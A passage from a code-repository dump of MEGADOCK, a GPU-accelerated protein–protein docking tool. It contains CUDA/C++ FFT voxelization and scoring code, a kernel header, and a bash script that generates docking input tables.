nf3=nBlocks_nf3*nThreads\\n\",nf3,nBlocks_nf3,nThreads);\n fprintf(stderr, \" [ERROR] too large FFT size. nf3:%d, nBlocks_nf3:%d\\n\", nf3, nBlocks_nf3);\n exit(1);\n }\n\n cudaSetDevice(myid2);\n //printf(\" #p10 [myid=%d]\\n\",myid2);\n\n ligand_voxelization_on_gpu(theta,myid2);\n checkCudaErrors( cudaDeviceSynchronize() );\n\n if(myid2==0) gettimeofday(&et2,NULL);\n if(myid2==0) _cputime->t3_1_ligand_voxelization += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n if(myid2==0) gettimeofday(&et1,NULL);\n\n cufft_result[myid2] = cufftExecC2C(cufft_plan[myid2], &CUFFTin_gpu[myid2][0], &CUFFTout_gpu[myid2][0], CUFFT_FORWARD);\n if(!cufft_result[myid2] == CUFFT_SUCCESS) {\n cout << \"!fail to exec 3d FFT (DFT, Lig):\" << cufft_result[myid2] << endl;\n exit(-1);\n }\n\n //*/\n checkCudaErrors( cudaDeviceSynchronize() );\n\n if(myid2==0) gettimeofday(&et2,NULL);\n if(myid2==0) _cputime->t3_2_fftprocess_ligand_fft += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n if(myid2==0) gettimeofday(&et1,NULL);\n convolution_gpu<<<nBlocks_nf3, nThreads>>>(nf3, _FFT_rec_r_gpu[myid2], _FFT_rec_i_gpu[myid2], CUFFTout_gpu[myid2], CUFFTin_gpu[myid2]);\n\n checkCudaErrors( cudaDeviceSynchronize() );\n\n if(myid2==0) gettimeofday(&et2,NULL);\n if(myid2==0) _cputime->t3_3_fftprocess_convolution += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n if(myid2==0) gettimeofday(&et1,NULL);\n\n cufft_result[myid2] = cufftExecC2C(cufft_plan[myid2], &CUFFTin_gpu[myid2][0], &CUFFTout_gpu[myid2][0], CUFFT_INVERSE);\n if(!(cufft_result[myid2] == CUFFT_SUCCESS)) {\n cout << \"!fail to exec 3d FFT (IDFT):\" << cufft_result[myid2] << endl;\n exit(-1);\n }\n //*\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et2,NULL);\n if(myid2==0) _cputime->t3_4_fftprocess_fft_inverse += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n if(myid2==0) gettimeofday(&et1,NULL);\n\n // Search max score translation position from CUFFTout_gpu[nf3]\n\n //printf(\" t=%d per angle\\n\",num_sort);\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Select[myid2][i].score = -99999.0;\n }\n\n max_pos_single<<<nBlocks_nf3, nThreads, sizeof(float)*nThreads>>>(nf3, CUFFTout_gpu[myid2], top_score_gpu[myid2], top_index_gpu[myid2]);\n checkCudaErrors( cudaDeviceSynchronize() );\n\n if(myid2==0) gettimeofday(&et3,NULL);\n checkCudaErrors( cudaMemcpy(top_score_host[myid2],top_score_gpu[myid2],sizeof(float)*nBlocks_nf3,cudaMemcpyDeviceToHost) );\n checkCudaErrors( cudaMemcpy(top_index_host[myid2],top_index_gpu[myid2],sizeof(int)*nBlocks_nf3,cudaMemcpyDeviceToHost) );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t6_data_transfer_in_loop += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n checkCudaErrors( cudaDeviceSynchronize() );\n\n if(num_sort!=1) {\n for(int i=0; i<nBlocks_nf3; i++) {\n if(top_index_host[myid2][i]/nf2 > nf1 || top_index_host[myid2][i] < 0){\n top_score_host[myid2][i] = -99999.99;\n //printf(\" error, %d | score, %f \\n\", top_index_host[myid2][i]/nf2, top_score_host[myid2][i]);\n }\n const float raw = top_score_host[myid2][i];\n if( raw < _Select[myid2][num_sort-1].score) continue;\n for( int j = 0 ; j < num_sort ; j++ ) {\n if( raw > _Select[myid2][j].score ) {\n for( int k = num_sort-1 ; k > j ; k-- ) {\n _Select[myid2][k] = _Select[myid2][k-1];\n }\n const int index = top_index_host[myid2][i];\n _Select[myid2][j].score = raw;\n _Select[myid2][j].index[1] = index / nf2;\n _Select[myid2][j].index[2] = (index / _Num_fft) % _Num_fft;\n _Select[myid2][j].index[3] = index % _Num_fft;\n break;\n }\n }\n }\n\n } else { // num_sort = 1, select only 1 score per 1 ligand angle\n for(int i=0; i<nBlocks_nf3; i++) {\n if(top_index_host[myid2][i]/nf2 > nf1 || top_index_host[myid2][i] < 0){\n top_score_host[myid2][i] = -99999.99;\n //printf(\" error, %d | score, %f \\n\", top_index_host[myid2][i]/nf2, top_score_host[myid2][i]);\n }\n if(temp_top_score < top_score_host[myid2][i]) {\n temp_top_score = top_score_host[myid2][i];\n temp_top_index = top_index_host[myid2][i];\n }\n }\n\n //printf(\" m:%f\\n\\n\",temp_top_score);\n //printf(\"%g (%d) [%d %d %d]\\n\", temp_top_score, _p, temp_top_index/(n*n),(temp_top_index/n)%n, temp_top_index%n );\n //printf(\"<%d> %g (%d/%d) %d\\n\", nBlocks,temp_top_score, temp_top_index, nf3, temp_top_index/nf2);\n\n _Select[myid2][0].score = temp_top_score;\n _Select[myid2][0].index[1] = temp_top_index / nf2;\n _Select[myid2][0].index[2] = (temp_top_index / nf1) % nf1;\n _Select[myid2][0].index[3] = temp_top_index % nf1;\n /* / DEBUG\n printf(\"TEST, %d\\n\", _Select[myid2][0].index[1]);\n if ( _Select[myid2][0].index[1] > nf1 ){\n printf(\" error, %d\\n\", _Select[myid2][0].index[1]);\n }*/\n\n }\n\n //*** score_sort ***********************************************************\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Select[myid2][i].index[0] = _Current_rot_angle_num[myid2];\n _Top[_Current_rot_angle_num[myid2]*num_sort+i] = _Select[myid2][i];\n }\n\n //size_t devmem_use, devmem_free, devmem_total;\n //cudaMemGetInfo(&devmem_free, &devmem_total);\n //devmem_use = devmem_total - devmem_free;\n //printf(\" [GPU (%d) memory] Use : %10u (%4.1f%%), Free : %10u (%4.1f%%), Total : %10u\\n\",myid2,devmem_use,(float)(100*devmem_use/devmem_total), devmem_free, (float)(100*devmem_free/devmem_total), devmem_total);\n\n\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et2,NULL);\n if(myid2==0) _cputime->t3_5_fftprocess_score_sort += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n return;\n}\n\n\n//============================================================================//\nvoid FFTProcessPDB::ligand_voxelization_on_gpu(float *theta, size_t myid2)\n//============================================================================//\n{\n const int ng1 = _Num_fft / 2;\n const int ng3 = ng1 * ng1 * ng1;\n const int nf1 = _Num_fft;\n const int nf2 = nf1 * nf1;\n const size_t nf3 = nf2 * nf1;\n\n const float delta = 1.0;\n const float surface = 1.0;\n const float grid_width = _parameter->grid_width;\n const int sr_half = (2.4 + grid_width - 0.01) / grid_width;\n const int sr = 2 * sr_half + 1;\n\n const int na = _ligand->num_atoms();\n const int nag = na * ng1;\n const int na_sr3 = na * sr * sr * sr;\n\n struct timeval et1, et2;\n struct timeval et3, et4;\n\n const int nThreads = NUM_THREADS;\n //const int nBlocks_na = (na + (nThreads-1)) / nThreads;\n const int nBlocks_nag = (nag + (nThreads-1)) / nThreads;\n const int nBlocks_na_sr3 = (na_sr3 + (nThreads-1)) / nThreads;\n const int nBlocks_ng3 = (ng3 + (nThreads-1)) / nThreads;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n if(nBlocks_nf3 * nThreads < nf3) {\n printf(\" nf3:%d, nBlocks_nf3:%d, nThreads:%d , nf3=nBlocks_nf3*nThreads\\n\",nf3,nBlocks_nf3,nThreads);\n fprintf(stderr, \" [ERROR] too large FFT size. nf3:%d, nBlocks_nf3:%d\\n\", nf3, nBlocks_nf3);\n exit(1);\n }\n\n //*\n //transfer ligand angle & calc xd,yd,zd,atom_coord_rotated\n if(myid2==0) gettimeofday(&et3,NULL);\n\n if(myid2==0) gettimeofday(&et1,NULL);\n checkCudaErrors( cudaMemcpy(ligand_rotation_angle_gpu[myid2], theta, sizeof(float)*3, cudaMemcpyHostToDevice) );\n if(myid2==0) gettimeofday(&et2,NULL);\n if(myid2==0) _cputime->t3_1_ligand_voxelization += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n //lig_rotation<<<nBlocks_na, nThreads>>>(na, ligand_rotation_angle_gpu[myid2],atom_coord_orig_gpu[myid2], mole_center_coord_gpu[myid2], atom_coord_rotated_gpu[myid2]);\n //checkCudaErrors( cudaDeviceSynchronize() );\n //lig_calc_dis_atomgrid<<<nBlocks_nag, nThreads>>>(na, ng1, xd_gpu[myid2], yd_gpu[myid2], zd_gpu[myid2], grid_coord_gpu[myid2], atom_coord_rotated_gpu[myid2]);\n //checkCudaErrors( cudaDeviceSynchronize() );\n ligvoxgpu_copy_htod<<<nBlocks_nag, nThreads>>>\n (na, ligand_rotation_angle_gpu[myid2], ng1, atom_coord_orig_gpu[myid2], mole_center_coord_gpu[myid2], atom_coord_rotated_gpu[myid2], xd_gpu[myid2], yd_gpu[myid2], zd_gpu[myid2], grid_coord_gpu[myid2]);\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_1_ligvoxgpu_copy_htod += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //grid[] initialize\n if(myid2==0) gettimeofday(&et3,NULL);\n lig_vox_init<<<nBlocks_nf3, nThreads>>>(ng3,nf3,grid_r_gpu[myid2],grid_i_gpu[myid2],CUFFTin_gpu[myid2]);\n //lig_vox_init_fft<<<nBlocks_nf3, nThreads>>>(nf3,CUFFTin_gpu[myid2]);\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_2_ligvoxgpu_kernel_init += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //atom fill(core)\n if(myid2==0) gettimeofday(&et3,NULL);\n lig_vox_fill<<<nBlocks_na_sr3, nThreads>>>\n (ng1,na,delta,radius_core2_gpu[myid2],xd_gpu[myid2],yd_gpu[myid2],zd_gpu[myid2],grid_coord_gpu[myid2],atom_coord_rotated_gpu[myid2],grid_r_gpu[myid2], grid_width);\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_3_ligvoxgpu_kernel_fill_core += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //surface cutting\n if(myid2==0) gettimeofday(&et3,NULL);\n lig_vox_surface_cut_CtoT<<<nBlocks_ng3, nThreads>>>(ng1,delta,grid_r_gpu[myid2]);\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_4_ligvoxgpu_kernel_cut_surf += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //atom fill(surf)\n if(myid2==0) gettimeofday(&et3,NULL);\n lig_vox_fill<<<nBlocks_na_sr3, nThreads>>>\n (ng1,na,surface,radius_surf2_gpu[myid2],xd_gpu[myid2],yd_gpu[myid2],zd_gpu[myid2],grid_coord_gpu[myid2],atom_coord_rotated_gpu[myid2],grid_r_gpu[myid2], grid_width);\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_5_ligvoxgpu_kernel_fill_surf += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //electro\n if(myid2==0) gettimeofday(&et3,NULL);\n\n if(_parameter->lig_elec_serial_flag == 0) {\n lig_vox_elec<<<nBlocks_ng3, nThreads>>>(ng1, na, grid_width, _Charge_gpu[myid2], atom_coord_rotated_gpu[myid2], grid_i_gpu[myid2]);\n } else {\n lig_vox_elec_serial<<<nBlocks_ng3, nThreads>>>(ng1, na, grid_width, _Charge_gpu[myid2], atom_coord_rotated_gpu[myid2], grid_i_gpu[myid2]);\n }\n\n /*\n float *tem_grid;\n const int ng2=ng1*ng1;\n tem_grid = new float[ng3];\n checkCudaErrors( cudaMemcpy(tem_grid, grid_i_gpu[myid2], sizeof(float)*ng3, cudaMemcpyDeviceToHost) );\n //for(int i=0;i<ng3;i++) if(tem_grid[i]!=0.0) printf(\" [%03d,%03d,%03d] : %6.3f\\n\",i/ng2,(i/ng1)%ng1,i%ng1,tem_grid[i]);\n //*/\n\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_6_ligvoxgpu_kernel_elec += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //set Voxel grid[ng3] into center of FFT grid[nf3]\n if(myid2==0) gettimeofday(&et3,NULL);\n ligand_voxel_set<<<nBlocks_ng3, nThreads>>>(ng1,CUFFTin_gpu[myid2],grid_r_gpu[myid2],grid_i_gpu[myid2]);\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_7_ligvoxgpu_kernel_set_array += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //*/\n}\n\n\n//============================================================================//\nvoid FFTProcessPDB::ligand_data_transfer_gpu(float *grid_coord)\n//============================================================================//\n{\n const int ng1 = _Num_fft / 2;\n const int na = _ligand->num_atoms();\n const int num_gpu = _parallel->num_gpu();\n const float rcore2 = 1.5; // ZDOCK parameter\n const float rsurf2 = 1.0; // ZDOCK parameter\n struct timeval et1, et2;\n\n float *radius_core2;\n float *radius_surf2;\n radius_core2 = new float[na];\n radius_surf2 = new float[na];\n\n for(int i = 0; i < na; i++) {\n radius_core2[i] = _ligand->_Radius[i] * _ligand->_Radius[i] * rcore2;\n radius_surf2[i] = _ligand->_Radius[i] * _ligand->_Radius[i] * rsurf2;\n }\n\n gettimeofday(&et1,NULL);\n for(int gpu_id = 0; gpu_id < num_gpu; gpu_id++) {\n cudaSetDevice(gpu_id);\n checkCudaErrors( cudaMemcpy(radius_core2_gpu[gpu_id], radius_core2, sizeof(float)*na, cudaMemcpyHostToDevice) );\n checkCudaErrors( cudaMemcpy(radius_surf2_gpu[gpu_id], radius_surf2, sizeof(float)*na, cudaMemcpyHostToDevice) );\n checkCudaErrors( cudaMemcpy(_Charge_gpu[gpu_id], _ligand->_Charge, sizeof(float)*na, cudaMemcpyHostToDevice) );\n checkCudaErrors( cudaMemcpy(grid_coord_gpu[gpu_id], grid_coord, sizeof(float)*ng1, cudaMemcpyHostToDevice) );\n checkCudaErrors( cudaMemcpy(atom_coord_orig_gpu[gpu_id], _ligand->_Coordinate, sizeof(float)*na*3, cudaMemcpyHostToDevice) );\n checkCudaErrors( cudaMemcpy(mole_center_coord_gpu[gpu_id], _ligand->_Center, sizeof(float)*3, cudaMemcpyHostToDevice) );\n }\n\n gettimeofday(&et2,NULL);\n _cputime->t6_data_transfer_lig += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n delete[] radius_core2;\n delete[] radius_surf2;\n\n return;\n}\n\n#endif /* CUFFT */\n\n\n\n//============================================================================//\nvoid FFTProcessPDB::fft_memory_free()\n//============================================================================//\n{\n const size_t nproc2 = _parallel->nproc2();\n const int num_gpu = _parallel->num_gpu();\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n\n for(int id = 0; id < nproc2; id++) {\n fftwf_destroy_plan(plan_fftw_forward[id]);\n fftwf_destroy_plan(plan_fftw_inverse[id]);\n }\n\n _cputime->record_free(sizeof(float)*nf3*2*(nproc2));\n\n#ifdef CUFFT\n\n //const int num_sort = _parameter->_Num_sort;\n const int nThreads = NUM_THREADS;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n\n for(int gpu_id = 0; gpu_id < num_gpu; gpu_id++) {\n cudaSetDevice(gpu_id);\n\n cufftDestroy(cufft_plan[gpu_id]);\n\n checkCudaErrors( cudaFree(CUFFTin_gpu[gpu_id]));\n checkCudaErrors( cudaFree(CUFFTout_gpu[gpu_id]));\n checkCudaErrors( cudaFree(_FFT_rec_r_gpu[gpu_id]));\n checkCudaErrors( cudaFree(_FFT_rec_i_gpu[gpu_id]));\n\n checkCudaErrors( cudaFree(grid_r_gpu[gpu_id]));\n checkCudaErrors( cudaFree(grid_i_gpu[gpu_id]));\n checkCudaErrors( cudaFree(grid_coord_gpu[gpu_id]));\n\n checkCudaErrors( cudaFree(radius_core2_gpu[gpu_id]));\n checkCudaErrors( cudaFree(radius_surf2_gpu[gpu_id]));\n checkCudaErrors( cudaFree(_Charge_gpu[gpu_id]));\n\n checkCudaErrors( cudaFree(xd_gpu[gpu_id]));\n checkCudaErrors( cudaFree(yd_gpu[gpu_id]));\n\n checkCudaErrors( cudaFree(zd_gpu[gpu_id]));\n\n checkCudaErrors( cudaFree(atom_coord_rotated_gpu[gpu_id]));\n checkCudaErrors( cudaFree(atom_coord_orig_gpu[gpu_id]));\n checkCudaErrors( cudaFree(mole_center_coord_gpu[gpu_id]));\n checkCudaErrors( cudaFree(ligand_rotation_angle_gpu[gpu_id]));\n\n checkCudaErrors( cudaFree(top_score_gpu[gpu_id]));\n checkCudaErrors( cudaFree(top_index_gpu[gpu_id]));\n\n delete [] top_score_host[gpu_id];\n delete [] top_index_host[gpu_id];\n\n }\n\n _cputime->record_free( sizeof(float)*nBlocks_nf3*num_gpu + sizeof(int)*nBlocks_nf3*num_gpu );\n\n#endif\n\n return;\n}\n" }, { "alpha_fraction": 0.5722261071205139, "alphanum_fraction": 0.5799022912979126, "avg_line_length": 33.530120849609375, "blob_id": "4a191ba50a436b155557d2f10b64faa26ad90c7d", "content_id": "e1df8bc97edba4e615b0e65d564117023ed371f3", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2866, "license_type": "permissive", "max_line_length": 256, "num_lines": 83, "path": "/megadock-scfa20/cuda_kernel.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// cuda_kernel.cu\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef CudaKernel_h\n#define CudaKernel_h 1\n\n__global__ void lig_vox_fill(int ng1\n ,int na\n ,float delta\n ,float *radius2\n ,float *xd\n ,float *yd\n ,float *zd\n ,float *grid_coord\n ,float *atom_coord_rotated\n ,float *grid_r\n \t\t\t\t\t\t ,float grid_width);\n\n\n\n__global__ void lig_rotation(int na, float *theta, float *atom_coord_orig, float *mole_center_coord, float *atom_coord_rotated);\n\n__global__ void ligvoxgpu_copy_htod(const int na, const float *const theta, const int ng1, const float *const atom_coord_orig, const float *const mole_center_coord, float *atom_coord_rotated, float *xd, float *yd, float *zd, const float *const grid_coord);\n\n__global__ void lig_calc_dis_atomgrid(int na, int ng1, float *xd, float *yd, float *zd, float *grid_coord, float *atom_coord_rotated);\n\n\n__global__ void lig_vox_init_grid(int ng3,float *grid_r,float *grid_i);\n\n\n__global__ void lig_vox_init_fft(int nf3,cufftComplex *lig_in);\n\n\n__global__ void lig_vox_init(int ng3,int nf3,float *grid_r,float *grid_i,cufftComplex *lig_in);\n\n__global__ void ligand_voxel_set(int ng1\n ,cufftComplex *lig_in\n ,float *grid_r\n ,float *grid_i);\n\n\n\n__global__ void lig_vox_surface_cut_CtoT(int ng1, float delta, float *grid_r);\n\n\n__global__ void lig_vox_elec(int ng1,int na,float grid_width,float *_Charge,float *atom_coord_rotated,float *grid_i);\n\n\n__global__ void lig_vox_elec_serial(int ng1,int na,float grid_width,float *_Charge,float *atom_coord_rotated,float *grid_i);\n\n\n\n__device__ void lig_vox_surface_cut_TtoO(int ng3, float delta, float *grid_r);\n\n\n__global__ void convolution_gpu(int nf3, float *rec_r, float *rec_i, cufftComplex *lig_out, cufftComplex *lig_in);\n\n\n__global__ void max_pos_single(int nf3, cufftComplex *out, float *score, int *pos);\n\n\n__global__ void max_pos_multi_set(int nf3, cufftComplex *out, float *temp_score, int *temp_index);\n\n\n//, std::vector<cufftComplex> *temp_result , thrust::vector<cufftComplex> *temp_result\n//thrust::device_ptr<cufftComplex> *temp_result cufftComplex *temp_result,thrust::device_ptr<cufftComplex> temp_result\n__global__ void max_pos_multi(int nf3, cufftComplex *out, float *score, int *pos,const int num_sort,const int offset);\n\n\n\n\n#endif\n" }, { "alpha_fraction": 0.6048791408538818, "alphanum_fraction": 0.6114910840988159, "avg_line_length": 27.115385055541992, "blob_id": "8718ea7d88f908bd7fcb2a84ed17f1b96207252b", "content_id": "f83effd29875a572a9fd83a1c12823a196601adf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4386, "license_type": "permissive", "max_line_length": 106, "num_lines": 156, "path": "/script/makeTable.sh", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "#!/bin/bash -e\nCWD=`pwd`\n\n# default params\nINTERACTIVE=${INTERACTIVE:-\"1\"}\nTABLE_ITEM_MAX=${TABLE_ITEM_MAX:-\"100000\"}\n\n# args\nif [ $# -lt 4 ] ; then\n echo \"Usage: $0 [RELATIVE_ROOT] [INPUT_DIR] [RECEPTOR_MATCH] [LIGAND_MATCH] [TABLE_TITLE]\"\n echo \"e.g.) $0 . data \\*_r.pdb \\*_l.pdb test\"\n echo \"e.g.) RUNTIME_RELATIVE_ROOT=/ $0 . data \\*_r.pdb \\*_l.pdb test\"\n echo \"e.g.) INERACTIVE=0 TABLE_ITEM_MAX=100 $0 . data \\*_r.pdb \\*_l.pdb test\"\n exit\nfi\n\nRELATIVE_ROOT=$1\nBASE_INPUT_DIR=${2:-\"data\"}\nRECEPTOR_MATCH=$3\nLIGAND_MATCH=$4\nTABLE_TITLE=$5\nRUNTIME_RELATIVE_ROOT=${RUNTIME_RELATIVE_ROOT:-$RELATIVE_ROOT}\n\nBASE_TABLE_DIR=\"table\"\nBASE_OUTPUT_DIR=\"out\"\n\n# print params\necho -e \" \\n\\\n# PATH\nRELATIVE_ROOT = ${RELATIVE_ROOT} \\n\\\nRUNTIME_RELATIVE_ROOT = ${RUNTIME_RELATIVE_ROOT} \\n\\\n# INPUT \\n\\\nINPUT_DIR = ${BASE_INPUT_DIR} \\n\\\nRECEPTOR_MATCH = ${RECEPTOR_MATCH} \\n\\\nLIGAND_MATCH = ${LIGAND_MATCH} \\n\\\nTABLE_TITLE = ${TABLE_TITLE} \\n\\\n# OUTPUT \\n\\\nTABLE_DIR = ${BASE_TABLE_DIR} \\n\\\nOUTPUT_DIR = ${BASE_OUTPUT_DIR} \\n\\\n# OPTIONS \\n\\\nTABLE_ITEM_MAX = ${TABLE_ITEM_MAX} \\n\\\nINTERACTIVE = ${INTERACTIVE} \\n\\\n\"\n\nINPUT_DIR=\"${RELATIVE_ROOT}/${BASE_INPUT_DIR}\"\nTABLE_DIR=\"${RELATIVE_ROOT}/${BASE_TABLE_DIR}/${TABLE_TITLE}\"\nOUTPUT_DIR=\"${RELATIVE_ROOT}/${BASE_OUTPUT_DIR}/${TABLE_TITLE}\"\n\nreceptor_targets=`ls ${INPUT_DIR}/${RECEPTOR_MATCH}`\nligand_targets=`ls ${INPUT_DIR}/${LIGAND_MATCH}`\ncommon_option=\"-O\"\nTABLE_FILE=\"${TABLE_DIR}/${TABLE_TITLE}.table\"\n\nreceptor_num=`echo ${receptor_targets} | wc -w`\nligand_num=`echo ${ligand_targets} | wc -w`\nnum_pairs=$(( ${receptor_num} * ${ligand_num}))\n\nif [ ${num_pairs} -gt ${TABLE_ITEM_MAX} ] ; then\n echo \"Note: # of total docking pairs is over limit (TABLE_ITEM_MAX=${TABLE_ITEM_MAX}) so it is trimmed.\"\n echo\n num_pairs=${TABLE_ITEM_MAX}\nfi\n\necho \"# of receptormatch : ${receptor_num}\"\necho \"# of ligand match : ${ligand_num}\"\necho \"# of total docking pairs : ${num_pairs}\"\necho\n\necho \"A table file will be generated at:\"\necho \" ${TABLE_FILE}\"\necho\necho \"Please check the above parameters are correctly set.\"\necho\n\nif [ ${INTERACTIVE} -ne 0 ]; then\n read -p \"> Start create a docking table: ok? (y/N): \" yn\n case \"$yn\" in [yY]*) ;; *) echo -e \"\\n abort.\" ; exit ;; esac\n echo\nfi\n\nif [ ${INTERACTIVE} -ne 0 ]; then\n echo \"> The following directories will be removed: \"\n echo \" TABLE_DIR = ${TABLE_DIR}\"\n echo \" OUTPUT_DIR = ${OUTPUT_DIR}\"\n read -p \"> ok? (y/N): \" yn\n case \"$yn\" in [yY]*) ;; *) echo -e \"\\n abort.\" ; exit ;; esac\n echo\nfi\n\necho \"> Removing directories ...\"\nrm -rf ${TABLE_DIR}\nrm -rf ${OUTPUT_DIR}\n\n####################################\n# generate table\n####################################\n\necho \"> Start creating a docking table ...\"\n\n# initialize\nmkdir -p ${TABLE_DIR}\nmkdir -p ${OUTPUT_DIR}\n\n# set RUNTIME_RELATIVE_ROOT\nRUNTIME_INPUT_DIR=\"${RUNTIME_RELATIVE_ROOT}/${BASE_INPUT_DIR}\"\nRUNTIME_TABLE_DIR=\"${RUNTIME_RELATIVE_ROOT}/${BASE_TABLE_DIR}/${TABLE_TITLE}\"\nRUNTIME_OUTPUT_DIR=\"${RUNTIME_RELATIVE_ROOT}/${BASE_OUTPUT_DIR}/${TABLE_TITLE}\"\n# replace first \"//\" to \"/\" if exists\nRUNTIME_INPUT_DIR=${RUNTIME_INPUT_DIR/\"//\"/\"/\"}\nRUNTIME_TABLE_DIR=${RUNTIME_TABLE_DIR/\"//\"/\"/\"}\nRUNTIME_OUTPUT_DIR=${RUNTIME_OUTPUT_DIR/\"//\"/\"/\"}\n\n# write header\necho \"TITLE=${TABLE_TITLE}\" >> \"${TABLE_FILE}\"\necho \"PARAM=-R \\$1 -L \\$2 -o \\$3 ${common_option}\" >> \"${TABLE_FILE}\"\n\n# set counter\nprogress_bar='####################'\nprogress_ratio=${#progress_bar}\ncount_max=${num_pairs}\ncount=0\n\n# write body\nfor receptor in ${receptor_targets} ; do\n\n r_filename=$(basename $receptor)\n receptor_path=\"${RUNTIME_INPUT_DIR}/${r_filename}\"\n\n for ligand in ${ligand_targets} ; do\n\n count=$(( count + 1 ))\n if [ $count -gt ${num_pairs} ] ; then break; fi\n\n l_filename=$(basename $ligand)\n ligand_path=\"${RUNTIME_INPUT_DIR}/${l_filename}\"\n\n # set output filepath\n output_path=\"${RUNTIME_OUTPUT_DIR}/${r_filename%.*}_${l_filename%.*}.out\"\n\n # write a line\n echo -e \"${receptor_path}\\t${ligand_path}\\t${output_path}\" >> \"${TABLE_FILE}\"\n\n # show progress\n progress=$(( count * progress_ratio / count_max ))\n echo -ne \"\\r[\\t$count / $count_max ] ${progress_bar:0:$progress}\"\n\n done\n\n if [ $count -gt $num_pairs ] ; then break; fi\n\ndone\n\necho\necho\necho \"Table file is generated at:\"\necho \" $TABLE_FILE\"\n" }, { "alpha_fraction": 0.563312828540802, "alphanum_fraction": 0.5701574087142944, "avg_line_length": 25.563636779785156, "blob_id": "b86b516fc6ac449abc83295c3dae64874dc296fd", "content_id": "e4c55f0f4493e3e943e5b3817501ce196ac0d867", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2922, "license_type": "permissive", "max_line_length": 135, "num_lines": 110, "path": "/megadock-scfa20/fft_process.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : FFTProcess\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef FFTProcess_h\n#define FFTProcess_h 1\n\n#include <algorithm>\n#include <functional>\n#include <cstring>\n#include <unistd.h>\n\n\n#include \"parallel.h\"\n#include \"parameter_table.h\"\n#include \"parameter_pdb.h\"\n#include \"protein.h\"\n#include \"ligand.h\"\n#include \"receptor.h\"\n\n#ifdef CUFFT\n#include \"helper_cuda.h\"\n#include \"cufft.h\"\n//#include <thrust/device_vector.h>\n//#include <thrust/device_ptr.h>\n\n#endif\n\n#include \"fftw3.h\"\n\nusing namespace std;\n\ntypedef struct {\n float score;\n int index[4];\n} SortScore;\n\ntemplate<class P> class FFTProcess\n{\nprivate:\n FFTProcess(FFTProcess &c) {}\n const FFTProcess & operator=(const FFTProcess &c);\n\nprotected:\n Parallel *_parallel;\n P *_parameter;\n Ligand<P> *_ligand;\n Receptor<P> *_receptor;\n vector<SortScore> _Top;\n vector< vector<SortScore> > _Select;\n int _Num_fft;\n float *_FFT_rec_r;\n float *_FFT_rec_i;\n virtual void alloc_fft() = 0;\npublic:\n FFTProcess(Parallel *pparallel,P *pparameter, Receptor<P> *preceptor, Ligand<P> *pligand)\n : _parallel(pparallel),_parameter(pparameter),_receptor(preceptor),_ligand(pligand) {\n\n#ifdef DEBUG\n cout << \"Constructing FFTProcess.\\n\";\n#endif\n //cout << \"FFTP const \"<< _parameter->_Num_sort <<endl; 